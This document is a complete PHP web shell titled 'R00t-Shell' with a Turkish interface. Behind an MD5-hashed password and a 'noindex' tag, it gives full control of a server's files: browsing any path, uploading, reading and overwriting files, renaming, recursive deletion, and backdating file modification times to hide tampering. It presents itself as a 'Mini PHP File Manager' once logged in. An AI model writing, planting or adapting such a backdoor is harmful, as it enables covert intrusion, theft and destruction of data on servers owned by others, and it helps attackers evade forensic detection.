<?php
session_start();
// MD5 ile korunan şifre
$hashedPassword = "6b7eecf573f016d16852df12eefb3c41";
if (isset($_GET['logout'])) {
    session_destroy();
    header("Location: " . strtok($_SERVER["REQUEST_URI"], '?'));
    exit;
}
if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {
    if (isset($_POST['login_password']) && md5($_POST['login_password']) === $hashedPassword) {
    $_SESSION['logged_in'] = true;
} else {
        echo '<head>
        <title>R00t-Shell</title>
        <meta name="robots" content="noindex">
        <style>
            body { background: black; color: red; font-family: monospace; text-align: center; padding-top: 100px; }
            input, button { background: #111; color: red; border: 1px solid red; padding: 10px; font-size: 16px; }
            button:hover { background: darkred; cursor: pointer; }
        </style></head>
        <form method="POST">
            <h1>⚠️ Yetkisiz Giriş Algılandı ⚠️</h1>
            <p>Lütfen sistem şifresini girin</p>
            <input type="password" name="login_password" placeholder="Şifre">
            <br><br>
            <button type="submit">Giriş</button>
        </form>';
        exit;
    }
}
$currentDir = isset($_POST['path']) ? $_POST['path'] : __DIR__;

// Silme onay sayfası
if (isset($_POST['confirm_delete'])) {
    $target = $_POST['confirm_delete'];
    $targetName = basename($target);
    echo '<!DOCTYPE html>
    <html>
    <head>
        <title>Silme Onayı</title>
        <style>
            body { font-family: monospace; background: #111; color: #ddd; padding: 20px; text-align: center; }
            .confirm-box { 
                background: #222; 
                padding: 20px; 
                border: 1px solid #555; 
                box-shadow: 0 0 15px #000;
                max-width: 500px;
                margin: 100px auto;
                border-radius: 5px;
            }
            button, a {
                background: #333;
                color: #fff;
                border: 1px solid #555;
                padding: 8px 15px;
                margin: 10px;
                cursor: pointer;
                text-decoration: none;
                display: inline-block;
            }
            .delete { background: #6b0000; }
            button:hover, a:hover { opacity: 0.9; }
        </style>
    </head>
    <body>
        <div class="confirm-box">
            <h2>Silme Onayı</h2>
            <p>"'.htmlspecialchars($targetName).'" öğesini silmek istediğinizden emin misiniz?</p>
            <form method="POST">
                <input type="hidden" name="delete" value="'.htmlspecialchars($target).'">
              
                 <input type="hidden" name="path" value="'.$currentDir.'">
                <button type="submit" class="delete">Evet, Sil</button>

                <a href="#" onclick="history.back(); return false;">İptal</a>
            </form>
        </div>
    </body>
    </html>';
    exit;
}

// Asıl silme işlemi
if (isset($_POST['delete'])) {
    function deleteRecursive($path) {
        if (is_file($path)) {
            unlink($path);
        } elseif (is_dir($path)) {
            $items = scandir($path);
            foreach ($items as $item) {
                if ($item === '.' || $item === '..') continue;
                deleteRecursive($path . DIRECTORY_SEPARATOR . $item);
            }
            rmdir($path);
        }
    }
    $target = $_POST['delete'];
    deleteRecursive($target);
}

if (isset($_POST['rename_path'], $_POST['new_name'])) {
    $from = $_POST['rename_path'];
    $to = dirname($from) . DIRECTORY_SEPARATOR . $_POST['new_name'];
    rename($from, $to);
}
if (isset($_POST['touch_path'], $_POST['touch_date'])) {
    $timestamp = strtotime($_POST['touch_date']);
    if (file_exists($_POST['touch_path']) && $timestamp) {
        touch($_POST['touch_path'], $timestamp);
        $currentDir = dirname($_POST['touch_path']);
    }
}
if (isset($_POST['edit_path'], $_POST['new_content'])) {
    file_put_contents($_POST['edit_path'], $_POST['new_content']);
}
if (isset($_POST['create_type'], $_POST['create_name'])) {
    $newItem = $currentDir . DIRECTORY_SEPARATOR . $_POST['create_name'];
    if ($_POST['create_type'] === 'folder') {
        mkdir($newItem);
    } else if ($_POST['create_type'] === 'file') {
        file_put_contents($newItem, '');
    }
}
if (isset($_FILES['upload_file'])) {
    $uploadDir = $currentDir . DIRECTORY_SEPARATOR . $_FILES['upload_file']['name'];
    move_uploaded_file($_FILES['upload_file']['tmp_name'], $uploadDir);
}
if (isset($_POST['edit_path']) && !isset($_POST['new_content'])) {
    $path = $_POST['edit_path'];
    if (file_exists($path)) {
        echo file_get_contents($path);
        exit;
    }
}
$scan = scandir($currentDir);
$dirs = [];
$files = [];
foreach ($scan as $item) {
    if ($item === '.' || $item === '..') continue;
    $fullPath = $currentDir . DIRECTORY_SEPARATOR . $item;
    if (is_dir($fullPath)) {
        $dirs[] = $item;
    } else {
        $files[] = $item;
    }
}
$items = array_merge($dirs, $files);
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Mini PHP File Manager</title>
    <style>
        body { font-family: monospace; background: #111; color: #ddd; padding: 20px; }
        table { width: 100%; border-collapse: collapse; background: #1a1a1a; }
        th, td { border: 1px solid #333; padding: 5px; text-align: left; vertical-align: top; }
        .menu { margin-bottom: 10px; }
        .breadcrumb button {
            background: none; border: none; color: #89c4ff; cursor: pointer; padding: 0 5px;
        }
        .breadcrumb button:hover { text-decoration: underline; }
        .popup {
            top: 50%; left: 50%; transform: translate(-50%, -50%);
            background: #222; padding: 20px; border: 1px solid #555; box-shadow: 0 0 15px #000;
            position: fixed;
            z-index: 1001;
            width: 80%;
            max-width: 800px;
        }
        .overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0,0,0,0.7);
            z-index: 1000;
        }
        .copyable { font-size: 0.8em; color: #aaa; user-select: all; }
        .name-list { display: none; white-space: pre-line; }
        input, select, button {
            background: #222; color: #eee; border: 1px solid #555;
        }
        button:hover { background: #333; cursor: pointer; }
        textarea {
            width: 100%;
            min-height: 400px;
            color: #eee;
            background-color: #111;
            font-family: monospace;
            padding: 10px;
            box-sizing: border-box;
            resize: vertical;
        }
        button {
            background: #333;
            color: #fff;
            border: 1px solid #555;
            padding: 8px 15px;
            margin: 3px;
            cursor: pointer;
        }
        button:hover {
            background: #444;
        }
    </style>
</head>
<body>
<div class="menu">
    <form method="POST" style="display:inline;">
        <input type="hidden" name="path" value="<?= dirname($currentDir) ?>">
        <button type="submit">⬅️ Üst Dizin</button>
    </form>
    <form method="POST" enctype="multipart/form-data" style="display:inline;">
        <input type="file" name="upload_file">
        <button type="submit">⬆️ Yükle</button>
        <input type="hidden" name="path" value="<?= $currentDir ?>">
    </form>
    <form method="POST" style="display:inline;">
        <input type="text" name="create_name" placeholder="Yeni dosya/klasör adı">
        <select name="create_type">
            <option value="file">📄 Dosya</option>
            <option value="folder">📁 Klasör</option>
        </select>
        <input type="hidden" name="path" value="<?= $currentDir ?>">
        <button type="submit">➕ Oluştur</button>
    </form>
    <button onclick="copyNames()">📋 Tüm İsimleri Kopyala</button>
    <a href="?logout=1" style="color:#aaa; float:right;">🔒 Çıkış Yap</a>
</div>
<?php
$pathParts = explode(DIRECTORY_SEPARATOR, trim($currentDir, DIRECTORY_SEPARATOR));
$breadcrumbPath = DIRECTORY_SEPARATOR;
?>
<div class="breadcrumb">
    <strong>Dizin:</strong>
    <?php foreach ($pathParts as $index => $part): ?>
        <?php $breadcrumbPath .= $part . DIRECTORY_SEPARATOR; ?>
        <form method="POST" style="display:inline;">
            <input type="hidden" name="path" value="<?= rtrim($breadcrumbPath, DIRECTORY_SEPARATOR) ?>">
            <button type="submit" <?= ($index === array_key_last($pathParts)) ? 'style="font-weight:bold;"' : '' ?>><?= htmlspecialchars($part) ?></button>
        </form>
        <?php if ($index !== array_key_last($pathParts)): ?> / <?php endif; ?>
    <?php endforeach; ?>
</div>
<div class="name-list" id="nameList">
<?php foreach ($items as $item): ?>
<?= htmlspecialchars($item) . "\n" ?>
<?php endforeach; ?>
</div>
<table>
<tr><th>Ad</th><th>İşlemler</th><th>Değişiklik Tarihi</th></tr>
<?php foreach ($items as $item):
    $fullPath = $currentDir . DIRECTORY_SEPARATOR . $item;
    $modDate = date("Y-m-d H:i:s", filemtime($fullPath));
?>
<tr>
    <td>
        <?php if (is_dir($fullPath)): ?>
            <form method="POST" onsubmit="return goTo('<?= $fullPath ?>')">
                <button type="submit">📁 <?= htmlspecialchars($item) ?></button>
            </form>
        <?php else: ?>
            📄 <?= htmlspecialchars($item) ?>
        <?php endif; ?>
    </td>
    <td>
        <div style="display:flex; gap:5px; flex-wrap:wrap;">
            <form method="POST" style="margin:0;">
                <input type="hidden" name="confirm_delete" value="<?= $fullPath ?>">
  <input type="hidden" name="path" value="<?=$currentDir?>">
                <button type="submit">🗑️ Sil</button>
            </form>
            <button onclick="renameItem('<?= $fullPath ?>')">✏️ Yeniden Adlandır</button>
            <?php if (is_file($fullPath)): ?>
                <button onclick="editFile('<?= $fullPath ?>')">📝 Düzenle</button>
            <?php endif; ?>
        </div>
    </td>
    <td>
        <form method="POST">
            <input type="text" name="touch_date" value="<?= $modDate ?>">
            <input type="hidden" name="touch_path" value="<?= $fullPath ?>">
            <button type="submit">📆 Güncelle</button>
        </form>
        <div class="copyable" onclick="copyText(this.innerText)"><?= $modDate ?></div>
    </td>
</tr>
<?php endforeach; ?>
</table>

<div id="editorArea" class="popup" style="display:none;">
    <form method="POST" id="editorForm">
        <input type="hidden" name="edit_path" id="editPath">
        <textarea name="new_content" id="fileContent" rows="20" cols="80"></textarea><br>
        <div style="margin-top:10px; text-align:right;">
            <button type="submit">💾 Kaydet</button>
            <button type="button" onclick="closeEditor()">❌ Kapat</button>
        </div>
    </form>
</div>
<div id="overlay" class="overlay" style="display:none;"></div>

<script>
function goTo(path) {
    const form = document.createElement('form');
    form.method = 'POST';
    form.innerHTML = `<input type="hidden" name="path" value="${path}">`;
    document.body.appendChild(form);
    form.submit();
    return false;
}

function copyText(text) {
    navigator.clipboard.writeText(text);
    alert("Kopyalandı: " + text);
}

function copyNames() {
    let names = document.getElementById('nameList').innerText.trim();
    navigator.clipboard.writeText(names).then(() => {
        alert("Sadece dosya ve klasör isimleri kopyalandı!");
    });
}

function editFile(path) {
    // Görünürlüğü ayarla
    document.getElementById('editorArea').style.display = 'block';
    document.getElementById('overlay').style.display = 'block';
    
    // Form elemanlarını hazırla
    document.getElementById('editPath').value = path;
    document.getElementById('fileContent').value = 'Yükleniyor...';
    
    // Fetch API ile içeriği al
    fetch('', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
            'X-Requested-With': 'XMLHttpRequest'
        },
        body: 'edit_path=' + encodeURIComponent(path)
    })
    .then(response => response.text())
    .then(content => {
        document.getElementById('fileContent').value = content;
    })
    .catch(error => {
        console.error('Dosya içeriği alınamadı:', error);
        document.getElementById('fileContent').value = 'Hata: Dosya içeriği alınamadı!';
    });
}

function closeEditor() {
    document.getElementById('editorArea').style.display = 'none';
    document.getElementById('overlay').style.display = 'none';
}

function closeEditorIfOutside(e) {
    const editorArea = document.getElementById('editorArea');
    if (e.target === document.getElementById('overlay')) {
        closeEditor();
    }
}

function renameItem(path) {
    const newName = prompt("Yeni isim:", path.split(/[\/\\]/).pop());
    if (newName) {
        const form = document.createElement('form');
        form.method = 'POST';
        form.innerHTML = `<input type="hidden" name="rename_path" value="${path}">
                          <input type="hidden" name="new_name" value="${newName}">
                          <input type="hidden" name="path" value="<?= $currentDir ?>">`;
        document.body.appendChild(form);
        form.submit();
    }
}

// Sayfa yüklendiğinde çalışacak
document.addEventListener('DOMContentLoaded', function() {
    // Overlay'a tıklama olayını ekle
    document.getElementById('overlay').addEventListener('click', closeEditorIfOutside);
    
    // Form submit olayını elle ekle
    document.getElementById('editorForm').addEventListener('submit', function(e) {
        // Normal form gönderimini engelleme
        e.preventDefault();
        
        const path = document.getElementById('editPath').value;
        const content = document.getElementById('fileContent').value;
        
        // Form verilerini hazırla
        const formData = new FormData();
        formData.append('edit_path', path);
        formData.append('new_content', content);
        formData.append('path', '<?= $currentDir ?>');
        
        // Ajax ile gönder
        fetch('', {
            method: 'POST',
            body: formData
        })
        .then(response => {
            closeEditor();
            // Sayfayı yenile
            window.location.reload();
        })
        .catch(error => {
            console.error('Kaydetme hatası:', error);
            alert('Dosya kaydedilemedi: ' + error);
        });
    });
});
</script>
</body>
</html>